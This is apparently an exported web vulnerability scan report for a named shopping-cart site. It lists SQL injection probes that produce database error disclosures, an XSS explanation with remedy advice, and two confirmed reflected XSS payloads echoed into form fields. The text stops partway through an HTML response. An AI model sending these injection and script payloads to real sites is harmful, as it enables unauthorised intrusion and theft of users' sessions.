User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.onlinemicrofiche.com
Cookie: ASPSESSIONIDQCSQTSDS=GLJKBIKAECEPABJMJKKMGAGI
Content-Length: 184
Accept-Encoding: gzip, deflate

Type=21&txtEmail='%2B%20convert(int,(CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97)))%20%2B'&txtPassword=3

Response

HTTP/1.1 500 Internal Server Error
Server: Microsoft-IIS/5.0
Date: Mon, 02 May 2011 04:02:38 GMT
Content-Length: 1335
Content-Type: text/html
Expires: Mon, 02 May 2011 04:02:38 GMT
Cache-control: private




<HTML>
<HEAD>
<META NAME="GENERATOR" Content="Microsoft Visual Studio 6.0">
<style type="text/css">
<!--
.size1 {font-size:1pt;font-family: Arial,Helvetica,Sans-serif;}
.size2 {font-size:2pt;font-family: Arial,Helvetica,Sans-serif;}
.size3 {font-size:3pt;font-family: Arial,Helvetica,Sans-serif;}
.size4 {font-size:4pt;font-family: Arial,Helvetica,Sans-serif;}
.size6 {font-size:6pt;font-family: Arial,Helvetica,Sans-serif;}
.size7 {font-size:7pt;font-family: Arial,Helvetica,Sans-serif;}
.size8 {font-size:8pt;font-family: Arial,Helvetica,Sans-serif;}
.size10 {font-size:10pt;font-family: Arial,Helvetica,Sans-serif;}
.size12 {font-size:12pt;font-family: Arial,Helvetica,Sans-serif;}
.size14 {font-size:14pt;font-family: Arial,Helvetica,Sans-serif;}
.size16 {font-size:16pt;font-family:Arial, Helvetica, Sans-serif;}
.Copywrite {FONT-SIZE: 9px; COLOR: #4c6b55; LINE-HEIGHT: 11px; FONT-FAMILY: Verdana, Arial, Helvetica, sans-serif; TEXT-DECORATION: none}

-->
</style>
<TITLE>Error Page</TITLE>
</HEAD>
<BODY>
There was an error. <br>If this continues, please call HLSM at: 570-719-9000 <br>ASP Description: Undefined function 'convert' in expression. <br>ASP File: /xtremepowersports/shoppingcart/hold/ProcessHold.asp <br>ASP Line: 198 <br>ASP Number: -2147217900 <br>
<P>&nbsp;</P>

</BODY>
</HTML>
- /xtremepowersports/shoppingcart/hold/ProcessHold.asp

/xtremepowersports/shoppingcart/hold/ProcessHold.asp

https://www.onlinemicrofiche.com/xtremepowersports/shoppingcart/hold/ProcessHold.asp

Parameters

Parameter Type Value
Type POST 21
txtEmail POST netsparker@example.com
txtPassword POST '+ convert(int,(CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97))) +'

Request

POST /xtremepowersports/shoppingcart/hold/ProcessHold.asp HTTP/1.1
Referer: https://www.onlinemicrofiche.com/xtremepowersports/shoppingcart/hold/ProcessHold.asp?Type=21
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.onlinemicrofiche.com
Cookie: ASPSESSIONIDQCSQTSDS=GLJKBIKAECEPABJMJKKMGAGI
Content-Length: 207
Accept-Encoding: gzip, deflate

Type=21&txtEmail=netsparker%40example.com&txtPassword='%2B%20convert(int,(CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97)))%20%2B'

Response

HTTP/1.1 500 Internal Server Error
Server: Microsoft-IIS/5.0
Date: Mon, 02 May 2011 04:03:00 GMT
Content-Length: 1335
Content-Type: text/html
Expires: Mon, 02 May 2011 04:03:00 GMT
Cache-control: private




<HTML>
<HEAD>
<META NAME="GENERATOR" Content="Microsoft Visual Studio 6.0">
<style type="text/css">
<!--
.size1 {font-size:1pt;font-family: Arial,Helvetica,Sans-serif;}
.size2 {font-size:2pt;font-family: Arial,Helvetica,Sans-serif;}
.size3 {font-size:3pt;font-family: Arial,Helvetica,Sans-serif;}
.size4 {font-size:4pt;font-family: Arial,Helvetica,Sans-serif;}
.size6 {font-size:6pt;font-family: Arial,Helvetica,Sans-serif;}
.size7 {font-size:7pt;font-family: Arial,Helvetica,Sans-serif;}
.size8 {font-size:8pt;font-family: Arial,Helvetica,Sans-serif;}
.size10 {font-size:10pt;font-family: Arial,Helvetica,Sans-serif;}
.size12 {font-size:12pt;font-family: Arial,Helvetica,Sans-serif;}
.size14 {font-size:14pt;font-family: Arial,Helvetica,Sans-serif;}
.size16 {font-size:16pt;font-family:Arial, Helvetica, Sans-serif;}
.Copywrite {FONT-SIZE: 9px; COLOR: #4c6b55; LINE-HEIGHT: 11px; FONT-FAMILY: Verdana, Arial, Helvetica, sans-serif; TEXT-DECORATION: none}

-->
</style>
<TITLE>Error Page</TITLE>
</HEAD>
<BODY>
There was an error. <br>If this continues, please call HLSM at: 570-719-9000 <br>ASP Description: Undefined function 'convert' in expression. <br>ASP File: /xtremepowersports/shoppingcart/hold/ProcessHold.asp <br>ASP Line: 198 <br>ASP Number: -2147217900 <br>
<P>&nbsp;</P>

</BODY>
</HTML>
- /xtremepowersports/shoppingcart/shoppingcart/ProcessOrder.asp

/xtremepowersports/shoppingcart/shoppingcart/ProcessOrder.asp

https://www.onlinemicrofiche.com/xtremepowersports/shoppingcart/shoppingcart/ProcessOrder.asp

Parameters

Parameter Type Value
Add POST Add Item To Shopping Cart
hdnType POST 12
txtPartNoAdd POST '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
txtQtyAdd POST 3

Request

POST /xtremepowersports/shoppingcart/shoppingcart/ProcessOrder.asp HTTP/1.1
Referer: https://www.onlinemicrofiche.com/xtremepowersports/shoppingcart/shoppingcart/ProcessOrder.asp?Type12
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.onlinemicrofiche.com
Cookie: ASPSESSIONIDQCSQTSDS=GLJKBIKAECEPABJMJKKMGAGI
Content-Length: 242
Accept-Encoding: gzip, deflate

Add=Add+Item+To+Shopping+Cart&hdnType=12&txtPartNoAdd='%2B%20(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)%20%2B'&txtQtyAdd=3

Response

HTTP/1.1 500 Internal Server Error
Server: Microsoft-IIS/5.0
Date: Mon, 02 May 2011 03:55:34 GMT
Content-Length: 1488
Content-Type: text/html
Expires: Mon, 02 May 2011 03:55:35 GMT
Cache-control: private




<HTML>
<HEAD>
<META NAME="GENERATOR" Content="Microsoft Visual Studio 6.0">
<style type="text/css">
<!--
.size1 {font-size:1pt;font-family: Arial,Helvetica,Sans-serif;}
.size2 {font-size:2pt;font-family: Arial,Helvetica,Sans-serif;}
.size3 {font-size:3pt;font-family: Arial,Helvetica,Sans-serif;}
.size4 {font-size:4pt;font-family: Arial,Helvetica,Sans-serif;}
.size6 {font-size:6pt;font-family: Arial,Helvetica,Sans-serif;}
.size7 {font-size:7pt;font-family: Arial,Helvetica,Sans-serif;}
.size8 {font-size:8pt;font-family: Arial,Helvetica,Sans-serif;}
.size10 {font-size:10pt;font-family: Arial,Helvetica,Sans-serif;}
.size12 {font-size:12pt;font-family: Arial,Helvetica,Sans-serif;}
.size14 {font-size:14pt;font-family: Arial,Helvetica,Sans-serif;}
.size16 {font-size:16pt;font-family:Arial, Helvetica, Sans-serif;}
.Copywrite {FONT-SIZE: 9px; COLOR: #4c6b55; LINE-HEIGHT: 11px; FONT-FAMILY: Verdana, Arial, Helvetica, sans-serif; TEXT-DECORATION: none}

-->
</style>
<TITLE>Error Page</TITLE>
</HEAD>
<BODY>
There was an error. <br>If this continues, please call HLSM at: 570-719-9000 <br>ASP Description: [Microsoft][ODBC Microsoft Access Driver] The Microsoft Jet database engine cannot find the input table or query 'syscolumns'. Make sure it exists and that its name is spelled correctly. <br>ASP File: /xtremepowersports/shoppingcart/shoppingcart/ProcessOrder.asp <br>ASP Line: 676 <br>ASP Number: -2147217865 <br>
<P>&nbsp;</P>

</BODY>
</HTML>
Cross-site Scripting

Cross-site Scripting

55 TOTAL
IMPORTANT
CONFIRMED
55
XSS (Cross-site Scripting) allows an attacker to execute a dynamic script (Javascript, VbScript) in the context of the application. This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by a user has been interpreted as HTML/Javascript/VbScript by the browser.

XSS targets the users of the application instead of the server. Although this is a limitation, since it allows attackers to hijack other users' session, an attacker might attack an administrator to gain full control over the application.

Impact

There are many different attacks that can be leveraged through the use of XSS, including:
  • Hi-jacking users' active session
  • Changing the look of the page within the victims browser.
  • Mounting a successful phishing attack.
  • Intercept data and perform man-in-the-middle attacks.

Remedy

The issue occurs because the browser interprets the input as active HTML, Javascript or VbScript. To avoid this, all input and output from the application should be filtered. Output should be filtered according to the output format and location. Typically the output location is HTML. Where the output is HTML ensure that all active content is removed prior to its presentation to the server.

Prior to sanitizing user input, ensure you have a pre-defined list of both expected and acceptable characters with which you populate a white-list. This list needs only be defined once and should be used to sanitize and validate all subsequent input.

There are a number of pre-defined, well structured white-list libraries available for many different environments, good examples of these include, OWASP Reform and Microsoft Anti Cross-site Scripting libraries are good examples.

Remedy References

External References

- /xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp

/xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp CONFIRMED

https://www.onlinemicrofiche.com/xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp

Parameters

Parameter Type Value
cmbAdvert POST 1
Register POST Register
txtAddress1 POST '"--></style></script><script>alert(0x00013D)</script>
txtAddress2 POST 3
txtAltPhone POST 3
txtBusinessName POST Smith
txtCity POST 3
txtCountry POST 3
txtEmail POST netsparker@example.com
txtFax POST 3
txtFirstName POST Smith
txtHint POST 3
txtLastName POST Smith
txtMiddleIntial POST 3
txtpassword POST 3
txtpassword2 POST 3
txtPhone POST 3
txtState POST AB
txtZip POST 3
Type POST 42

Request

POST /xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp HTTP/1.1
Referer: https://www.onlinemicrofiche.com/xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp?Type=41
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.onlinemicrofiche.com
Cookie: ASPSESSIONIDQCSQTSDS=GLJKBIKAECEPABJMJKKMGAGI
Content-Length: 377
Accept-Encoding: gzip, deflate

cmbAdvert=1&Register=Register&txtAddress1='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x00013D)%3c%2fscript%3e&txtAddress2=3&txtAltPhone=3&txtBusinessName=Smith&txtCity=3&txtCountry=3&txtEmail=netsparker%40example.com&txtFax=3&txtFirstName=Smith&txtHint=3&txtLastName=Smith&txtMiddleIntial=3&txtpassword=3&txtpassword2=3&txtPhone=3&txtState=AB&txtZip=3&Type=42

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Mon, 02 May 2011 03:24:35 GMT
Content-Length: 12522
Content-Type: text/html
Cache-control: private



<html>
<head>
<title>Xtreme Powersports' General Information</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<style type="text/css">
<!--
.size1 {font-size:1pt;font-family: Arial,Helvetica,Sans-serif;}
.size2 {font-size:2pt;font-family: Arial,Helvetica,Sans-serif;}
.size3 {font-size:3pt;font-family: Arial,Helvetica,Sans-serif;}
.size4 {font-size:4pt;font-family: Arial,Helvetica,Sans-serif;}
.size6 {font-size:6pt;font-family: Arial,Helvetica,Sans-serif;}
.size7 {font-size:7pt;font-family: Arial,Helvetica,Sans-serif;}
.size8 {font-size:8pt;font-family: Arial,Helvetica,Sans-serif;}
.size10 {font-size:10pt;font-family: Arial,Helvetica,Sans-serif;}
.size12 {font-size:12pt;font-family: Arial,Helvetica,Sans-serif;}
.size14 {font-size:14pt;font-family: Arial,Helvetica,Sans-serif;}
.size16 {font-size:16pt;font-family:Arial, Helvetica, Sans-serif;}
.Copywrite {FONT-SIZE: 9px; COLOR: #4c6b55; LINE-HEIGHT: 11px; FONT-FAMILY: Verdana, Arial, Helvetica, sans-serif; TEXT-DECORATION: none}
-->
</style>
</head>
<body bgcolor="#FFFFFF" leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<table width="596" border="1" align="center" Class=Size8>
<tr Class=size10>
<td bgcolor="#FF0000"><font color="#FFFFFF"><b>ERRORS!!! Please review the error list below and fill in the form properly!</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<p>
&nbsp;&nbsp;The Create a Password was wrong length<br>
&nbsp;&nbsp;The Confirm a Password was wrong length<br>
&nbsp;&nbsp;The passwords has less then 4 charactors, please reenter passwords<br>

</p>
</td>
</tr>
</table>


<table width="596" border="0" align="center" Class=size8>
<tr bgcolor="#000099">
<td height="2"><font color="#FFFFFF"><b><a name="NewCustomer"></a>&nbsp;&nbsp;

New Customer Information

</b></font></td>
</tr>
<tr align="left" valign="top">
<td>

<form name="form1" method="post" action="ProcessInfo.asp" style="margin:0;Padding:0;">
<input type="hidden" name="Type" value="42">

<table width="100%" Class=size8>
<tr>
<td>
<b>All items in<font color="#FF0000"> RED</font> must be completed

</b>
</td>
</tr>
</table>
<table width="580" border="1" Class=size8>

<tr>
<td bgcolor="#000099"><font color="#FFFFFF"><b>&nbsp;

Enter Password and Hint Word (This will be used to review and track your orders)

</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<table width="580" border="0" Class=size8>
<tr>
<td align="left" valign="middle"><font color="#FF0000">
Create a Password:&nbsp;
</font>

<input type="password" name="txtpassword" size="10" maxlength="10" Class=size8 value="3">

&nbsp;&nbsp;Must be 6 to 10 characters.&nbsp;&nbsp;
<font color="#FF0000">Confirm Password:&nbsp;</font>

<input type="password" name="txtPassword2" size="10" maxlength="10" Class=size8 value="3">

</td>
</tr>
</table>
<table width="580" border="0" Class=size8>
<tr>
<td align="left" valign="middle"><font color="#FF0033">Hint:&nbsp;</font>

<input type="text" name="txtHint" size="10" maxlength="10" Class=size8 value="3">

&nbsp;&nbsp;This will be Emailed to you if you forget your password.</td>
</tr>
</table>
</td>
</tr>

<tr>
<td bgcolor="#000099"><font color="#FFFFFF"><b>&nbsp;
Name:
</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<table width="580" Class=size8>
<tr>
<td align="left" valign="middle"><font color="#FF0000">First
Name:&nbsp;</font>
<input type="text" name="txtFirstName" size="15" maxlength="20" Class=size8

value="Smith"

>
<font color="#FF0000">&nbsp;&nbsp;Last Name:&nbsp;</font>
<input type="text" name="txtLastName" size="15" maxlength="25" Class=size8

value="Smith"

>
&nbsp;&nbsp;Middle Initial:&nbsp;
<input type="text" name="txtMiddleIntial" size="3" maxlength="4" Class=size8

value="3"

>
</td>
</tr>
</table>
<table width="580" border="0" Class=size8>
<tr>
<td align="left" valign="middle">Business Name:&nbsp;
<input type="text" name="txtBusinessName" size="40" maxlength="45" Class=size8

value="Smith"

>
</td>
</tr>
</table>
</td>
</tr>
<tr align="left" valign="top">
<td height="15" bgcolor="#000099"><font color="#FFFFFF"><b>&nbsp;
Address:
</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<table width="580" Class=size8>
<tr>
<td><font color="#FF0000">Address1:&nbsp;</font>
<input type="text" name="txtAddress1" size="25" maxlength="30" Class=size8

value="'"--></style></script><script>netsparker(0x00013D)</script>"

>
&nbsp;&nbsp;Address2:&nbsp;
<input type="text" name="txtAddress2" size="25" maxlength="30" Class=size8

value="3"

>
</td>
</tr>
</table>
<table Width=100% Class=size8>
<tr>
<td><font color="#FF0000">City:&nbsp;</font>
<input type="text" name="txtCity" size="25" maxlength="30" Class=size8

value="3"

>
&nbsp;&nbsp;<font color="ff0000">State/Providence:&nbsp;</font>
<select name="txtState" Class=size8>
<option value="Other Country">Other Country</option>
<option value="AB" selected>AB</option>
<option value="AL">AL</option>
<option value="AK">AK</option>
<option value="AZ">AZ</option>
<option value="AR">AR</option>
<option value="BC">BC</option>
<option value="CA">CA</option>
<option value="CO">CO</option>
<option value="CT">CT</option>
<option value="DE">DE</option>
<option value="DC">DC</option>
<option value="FL">FL</option>
<option value="GA">GA</option>
<option value="HI">HI</option>
<option value="ID">ID</option>
<option value="IL">IL</option>
<option value="IN">IN</option>
<option value="IA">IA</option>
<option value="KS">KS</option>
<option value="KY">KY</option>
<option value="LA">LA</option>
<option value="ME">ME</option>
<option value="MD">MD</option>
<option value="MA">MA</option>
<option value="MB">MB</option>
<option value="MI">MI</option>
<option value="MN">MN</option>
<option value="MO">MO</option>
<option value="MS">MS</option>
<option value="MT">MT</option>
<option value="NB">NB</option>
<option value="NC">NC</option>
<option value="ND">ND</option>
<option value="NE">NE</option>
<option value="NH">NH</option>
<option value="NJ">NJ</option>
<option value="NL">NL</option>
<option value="NM">NM</option>
<option value="NS">NS</option>
<option value="NT">NT</option>
<option value="NU">NU</option>
<option value="NV">NV</option>
<option value="NY">NY</option>
<option value="OH">OH</option>
<option value="OK">OK</option>
<option value="ON">ON</option>
<option value="OR">OR</option>
<option value="PA">PA</option>
<option value="PR">PR</option>
<option value="PE">PE</option>
<option value="QC">QC</option>
<option value="RI">RI</option>
<option value="SC">SC</option>
<option value="SD">SD</option>
<option value="SK">SK</option>
<option value="TN">TN</option>
<option value="TX">TX</option>
<option value="UT">UT</option>
<option value="VT">VT</option>
<option value="VA">VA</option>
<option value="WA">WA</option>
<option value="WV">WV</option>
<option value="WI">WI</option>
<option value="WY">WY</option>
<option value="YT">YT</option>

</select>
&nbsp;&nbsp;<font color="#FF0000">Zip:&nbsp;</font>
<input type="text" name="txtZip" size="12" maxlength="15" Class=size8

value="3"

>
</td>
</tr>
</table>
<table width="580" Class=size8>
<tr>
<td>Other Country:&nbsp;
<input type="text" name="txtCountry" size="30" maxlength="35" Class=size8

value="3"

>
&nbsp;&nbsp;Must be completed if not in United States
</td>
</tr>
</table>
</td>
</tr>
<tr>
<td bgcolor="#000099" height="9"><font color="#FFFFFF"><b>&nbsp;Contact
Information:</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<table Class=size8 Width=100%>
<tr>
<td><font color="#FF0000">Phone #:&nbsp;</font>
<input type="text" name="txtPhone" size="15" maxlength="20" Class=size8

value="3"

>
&nbsp;&nbsp;Alt Phone #:&nbsp;
<input type="text" name="txtAltPhone" size="15" maxlength="20" Class=size8

value="3"

>
&nbsp;&nbsp;Fax #:&nbsp;
<input type="text" name="txtFax" size="15" maxlength="20" Class=size8

value="3"

>
</td>
</tr>
</table>
<table width="100%" Class=size8>
<tr>
<td><font color="#FF0000">Email Address:&nbsp;</font>

<input type="text" name="txtEmail" size="40" maxlength="45" Class=size8

value="netsparker@example.com">


</td>
</tr>
</table>
</td>
</tr>

<tr align="left" valign="middle">
<td bgcolor="#000099"><font color="#FFFFFF"><b>&nbsp;How did you hear about us:</b></font></td>
</tr>
<tr align="center" valign="top">
<td>
<table width="100%" Class=size8>
<tr align="center" valign="middle">
<td>Please Select One:&nbsp;
<select name="cmbAdvert" Class=size8>

<option value="1" Selected>Search Engine</option>
<option value="2">Other Web Site</option>
<option value="3">Print Ad</option>
<option value="4">Radio Ad</option>
<option value="5">Friend</option>
<option value="6">Email</option>
<option value="7"></option>

</select>
</td>
</tr>
</table>
</td>
</tr>

</table>
<table width="100%" border="0">
<tr align="center" valign="middle">
<td>


<input type="submit" name="Register" value="Register" Class=size8>


</td>
</tr>
</table>
</form>
</td>
</tr>
</table>

<table width="100%" border="0" cellspacing="0" cellpadding="0">
<TR>
<TD height=30>&nbsp;</TD>
</TR>
<tr align="center" valign="top" Class="Copywrite">
<td>Copyright � 2011 HLSM, Inc. All rights reserved. <br>
This material may not be published, broadcast, rewritten, or redistributed.<br>
For further information, contact HLSM, Inc.</td>
</tr>
</table>
</body>
</html>
- /xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp

/xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp CONFIRMED

https://www.onlinemicrofiche.com/xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp

Parameters

Parameter Type Value
cmbAdvert POST 1
Register POST Register
txtAddress1 POST 3
txtAddress2 POST '"--></style></script><script>alert(0x00013E)</script>
txtAltPhone POST 3
txtBusinessName POST Smith
txtCity POST 3
txtCountry POST 3
txtEmail POST netsparker@example.com
txtFax POST 3
txtFirstName POST Smith
txtHint POST 3
txtLastName POST Smith
txtMiddleIntial POST 3
txtpassword POST 3
txtpassword2 POST 3
txtPhone POST 3
txtState POST AB
txtZip POST 3
Type POST 42

Request

POST /xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp HTTP/1.1
Referer: https://www.onlinemicrofiche.com/xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp?Type=41
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.onlinemicrofiche.com
Cookie: ASPSESSIONIDQCSQTSDS=GLJKBIKAECEPABJMJKKMGAGI
Content-Length: 377
Accept-Encoding: gzip, deflate

cmbAdvert=1&Register=Register&txtAddress1=3&txtAddress2='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x00013E)%3c%2fscript%3e&txtAltPhone=3&txtBusinessName=Smith&txtCity=3&txtCountry=3&txtEmail=netsparker%40example.com&txtFax=3&txtFirstName=Smith&txtHint=3&txtLastName=Smith&txtMiddleIntial=3&txtpassword=3&txtpassword2=3&txtPhone=3&txtState=AB&txtZip=3&Type=42

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Mon, 02 May 2011 03:24:39 GMT
Content-Length: 12522
Content-Type: text/html
Cache-control: private



<html>
<head>
<title>Xtreme Powersports' General Information</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<style type="text/css">
<!--
.size1 {font-size:1pt;font-family: Arial,Helvetica,Sans-serif;}
.size2 {font-size:2pt;font-family: Arial,Helvetica,Sans-serif;}
.size3 {font-size:3pt;font-family: Arial,Helvetica,Sans-serif;}
.size4 {font-size:4pt;font-family: Arial,Helvetica,Sans-serif;}
.size6 {font-size:6pt;font-family: Arial,Helvetica,Sans-serif;}
.size7 {font-size:7pt;font-family: Arial,Helvetica,Sans-serif;}
.size8 {font-size:8pt;font-family: Arial,Helvetica,Sans-serif;}
.size10 {font-size:10pt;font-family: Arial,Helvetica,Sans-serif;}
.size12 {font-size:12pt;font-family: Arial,Helvetica,Sans-serif;}
.size14 {font-size:14pt;font-family: Arial,Helvetica,Sans-serif;}
.size16 {font-size:16pt;font-family:Arial, Helvetica, Sans-serif;}
.Copywrite {FONT-SIZE: 9px; COLOR: #4c6b55; LINE-HEIGHT: 11px; FONT-FAMILY: Verdana, Arial, Helvetica, sans-serif; TEXT-DECORATION: none}
-->
</style>
</head>
<body bgcolor="#FFFFFF" leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<table width="596" border="1" align="center" Class=Size8>
<tr Class=size10>
<td bgcolor="#FF0000"><font color="#FFFFFF"><b>ERRORS!!! Please review the error list below and fill in the form properly!</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<p>
&nbsp;&nbsp;The Create a Password was wrong length<br>
&nbsp;&nbsp;The Confirm a Password was wrong length<br>
&nbsp;&nbsp;The passwords has less then 4 charactors, please reenter passwords<br>

</p>
</td>
</tr>
</table>


<table width="596" border="0" align="center" Class=size8>
<tr bgcolor="#000099">
<td height="2"><font color="#FFFFFF"><b><a name="NewCustomer"></a>&nbsp;&nbsp;

New Customer Information

</b></font></td>
</tr>
<tr align="left" valign="top">
<td>

<form name="form1" method="post" action="ProcessInfo.asp" style="margin:0;Padding:0;">
<input type="hidden" name="Type" value="42">

<table width="100%" Class=size8>
<tr>
<td>
<b>All items in<font color="#FF0000"> RED</font> must be completed

</b>
</td>
</tr>
</table>
<table width="580" border="1" Class=size8>

<tr>
<td bgcolor="#000099"><font color="#FFFFFF"><b>&nbsp;

Enter Password and Hint Word (This will be used to review and track your orders)

</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<table width="580" border="0" Class=size8>
<tr>
<td align="left" valign="middle"><font color="#FF0000">
Create a Password:&nbsp;
</font>

<input type="password" name="txtpassword" size="10" maxlength="10" Class=size8 value="3">

&nbsp;&nbsp;Must be 6 to 10 characters.&nbsp;&nbsp;
<font color="#FF0000">Confirm Password:&nbsp;</font>

<input type="password" name="txtPassword2" size="10" maxlength="10" Class=size8 value="3">

</td>
</tr>
</table>
<table width="580" border="0" Class=size8>
<tr>
<td align="left" valign="middle"><font color="#FF0033">Hint:&nbsp;</font>

<input type="text" name="txtHint" size="10" maxlength="10" Class=size8 value="3">

&nbsp;&nbsp;This will be Emailed to you if you forget your password.</td>
</tr>
</table>
</td>
</tr>

<tr>
<td bgcolor="#000099"><font color="#FFFFFF"><b>&nbsp;
Name:
</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<table width="580" Class=size8>
<tr>
<td align="left" valign="middle"><font color="#FF0000">First
Name:&nbsp;</font>
<input type="text" name="txtFirstName" size="15" maxlength="20" Class=size8

value="Smith"

>
<font color="#FF0000">&nbsp;&nbsp;Last Name:&nbsp;</font>
<input type="text" name="txtLastName" size="15" maxlength="25" Class=size8

value="Smith"

>
&nbsp;&nbsp;Middle Initial:&nbsp;
<input type="text" name="txtMiddleIntial" size="3" maxlength="4" Class=size8

value="3"

>
</td>
</tr>
</table>
<table width="580" border="0" Class=size8>
<tr>
<td align="left" valign="middle">Business Name:&nbsp;
<input type="text" name="txtBusinessName" size="40" maxlength="45" Class=size8

value="Smith"

>
</td>
</tr>
</table>
</td>
</tr>
<tr align="left" valign="top">
<td height="15" bgcolor="#000099"><font color="#FFFFFF"><b>&nbsp;
Address:
</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<table width="580" Class=size8>
<tr>
<td><font color="#FF0000">Address1:&nbsp;</font>
<input type="text" name="txtAddress1" size="25" maxlength="30" Class=size8

value="3"

>
&nbsp;&nbsp;Address2:&nbsp;
<input type="text" name="txtAddress2" size="25" maxlength="30" Class=size8

value="'"--></style></script><script>netsparker(0x00013E)</script>"

>
</td>
</tr>
</table>
<table Width=100% Class=size8>
<tr>
<td><font color="#FF0000">City:&nbsp;</font>
<input type="text" name="txtCity" size="25" maxlength="30" Class=size8

value="3"

>
&nbsp;&nbsp;<font color="ff0000">State/Providence:&nbsp;</font>
<select name="txtState" Class=size8>
<option value="Other Country">Other Country</option>
<option value="AB" selected>AB</option>
<option value="AL">AL</option>
<option value="AK">AK</option>
<option value="AZ">AZ</option>
<option value="AR">AR</option>
<option value="BC">BC</option>
<option value="CA">CA</option>
<option value="CO">CO</option>
<option value="CT">CT</option>
<option value="DE">DE</option>
<option value="DC">DC</option>
<option value="FL">FL</option>
<option value="GA">GA</option>
<option value="HI">HI</option>
<option value="ID">ID</option>
<option value="IL">IL</option>
<option value="IN">IN</option>
<option value="IA">IA</option>
<option value="KS">KS</option>
<option value="KY">KY</option>
<option value="LA">LA</option>
<option value="ME">ME</option>
<option value="MD">MD</option>
<option value="MA">MA</option>
<option value="MB">MB</option>
<option value="MI">MI</option>
<option value="MN">MN</option>
<option value="MO">MO</option>
<option value="MS">MS</option>
<option value="MT">MT</option>
<option value="NB">NB</option>
<option value="NC">NC</option>
<option value="ND">ND</option>
<option value="NE">NE</option>
<option value="NH">NH</option>
<option value="NJ">NJ</option>
<option value="NL">NL</option>
<option value="NM">NM</option>
<option value="NS">NS</option>
<option value="NT">NT</option>
<option value="NU">NU</option>
<option value="NV">NV</option>
<option value="NY">NY</option>
<option value="OH">OH</option>
<option value="OK">OK</option>
<option value="ON">ON</option>
<option value="OR">OR</option>
<option value="PA">PA</option>
<option value="PR">PR</option>
<option value="PE">PE</option>
<option value="QC">QC</option>
<option value="RI">RI</option>
<option value="SC">SC</option>
<option value="SD">SD</option>
<option value="SK">SK</option>
<option value="TN">TN</option>
<option value="TX">TX</option>
<option value="UT">UT</option>
<option value="VT">VT</option>
<option value="VA">VA</option>
<option value="WA">WA</option>
<option value="WV">WV</option>
<option value="WI">WI</option>
<option value="WY">WY</option>
<option value="YT">YT</option>

</select>
&nbsp;&nbsp;<font color="#FF0000">Zip:&nbsp;</font>
<input type="text" name="txtZip" size="12" maxlength="15" Class=size8

value="3"

>
</td>
</tr>
</table>
<table width="580" Class=size8>
<tr>
<td>Other Country:&nbsp;
<input type="text" name="txtCountry" size="30" maxlength="35" Class=size8

value="3"

>
&nbsp;&nbsp;Must be completed if not in United States
</td>
</tr>
</table>
</td>
</tr>
<tr>
<td bgcolor="#000099" height="9"><font color="#FFFFFF"><b>&nbsp;Contact
Information:</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<table Class=size8 Width=100%>
<tr>
<td><font color="#FF0000">Phone #:&nbsp;</font>
<input type="text" name="txtPhone" size="15" maxlength="20" Class=size8

value="3"

>
